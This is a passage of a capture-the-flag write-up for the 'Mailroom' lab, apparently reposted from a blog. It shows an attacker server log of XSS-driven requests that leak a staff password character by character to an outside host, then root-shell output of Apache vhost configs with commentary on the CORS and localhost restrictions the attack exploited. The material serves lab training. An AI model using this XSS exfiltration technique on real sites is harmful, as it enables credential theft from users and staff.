[2023-05-03T12:03:50.510Z]  "GET /guess_password.js?69tris" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:52.582Z]  "GET /r8.sh?n" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:53.417Z]  "GET /guess_password.js?69trisR" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:55.632Z]  "GET /r8.sh?an" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:57.588Z]  "GET /guess_password.js?69trisRu" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:59.363Z]  "GET /r8.sh?tan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:01.129Z]  "GET /guess_password.js?69trisRul" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:02.564Z]  "GET /r8.sh?stan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:04.469Z]  "GET /guess_password.js?69trisRule" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:06.678Z]  "GET /r8.sh?istan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:08.018Z]  "GET /guess_password.js?69trisRulez" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:09.113Z]  "GET /r8.sh?ristan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:09.905Z]  "GET /guess_password.js?69trisRulez!" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:11.824Z]  "GET /r8.sh?tristan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:13.160Z]  "GET /favicon.ico" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[Wed May  3 12:05:31 2023] 10.10.11.209:39216 [200]: GET /?c=123
[Wed May  3 12:05:31 2023] 10.10.11.209:39216 Closing

I'm still not fluent with git at this point. The three vhost configs below are still worth reading: the staff panel is reachable only from 127.0.0.1 and 172.19.0.1, which is why it had to be attacked through the target's own browser via the XSS and later curled from an SSH session, and its `Header set Access-Control-Allow-Origin "*"` is what lets the injected script read auth.php's JSON response; without it the /"success":true/ test above would never fire.

root@3ae5bc817f72:/etc/apache2/sites-enabled# ls -al 
total 8
drwxr-xr-x 1 root root 4096 Jan 17 19:56 .
drwxr-xr-x 1 root root 4096 Nov 15 04:17 ..
lrwxrwxrwx 1 root root   36 Jan 17 19:56 000-mailroom.conf -> ../sites-available/000-mailroom.conf
lrwxrwxrwx 1 root root   37 Jan 17 19:56 001-staffroom.conf -> ../sites-available/001-staffroom.conf
lrwxrwxrwx 1 root root   33 Jan 17 19:56 002-gitea.conf -> ../sites-available/002-gitea.conf
root@3ae5bc817f72:/etc/apache2/sites-enabled# cat 000-mailroom.conf 
<VirtualHost *:80>
    ServerName mailroom.htb
    
    # Block access to template directory
    <Directory /var/www/mailroom/template>
        Require all denied
    </Directory>

    # Hide git directory
    RedirectMatch 404 /\.git

    # DocumentRoot
    DocumentRoot /var/www/mailroom
</VirtualHost>
root@3ae5bc817f72:/etc/apache2/sites-enabled# 



root@3ae5bc817f72:/etc/apache2/sites-enabled# cat 001-staffroom.conf 
<VirtualHost *:80>
    ServerName staff-review-panel.mailroom.htb

    # Allow CORS
    Header set Access-Control-Allow-Origin "*"
        
    # Block connections from outside localhost
    <Directory />
        Allow from 127.0.0.1
        Allow from 172.19.0.1
        Deny from all
    </Directory>

    # Hide git directory
    RedirectMatch 404 /\.git

    # DocumentRoot
    DocumentRoot /var/www/staffroom
</VirtualHost>
root@3ae5bc817f72:/etc/apache2/sites-enabled# 
root@3ae5bc817f72:/etc/apache2/sites-enabled# 
root@3ae5bc817f72:/etc/apache2/sites-enabled# cat 002-gitea.conf  
<VirtualHost *:80>
    ServerName git.mailroom.htb
    
    # Access to gitea docker
    ProxyPass / http://gitea:3000/
    ProxyPassReverse / http://gitea:3000/
    
</VirtualHost>
root@3ae5bc817f72:/etc/apache2/sites-enabled# 


Reposted from blog.csdn.net/qq_29060627/article/details/130447998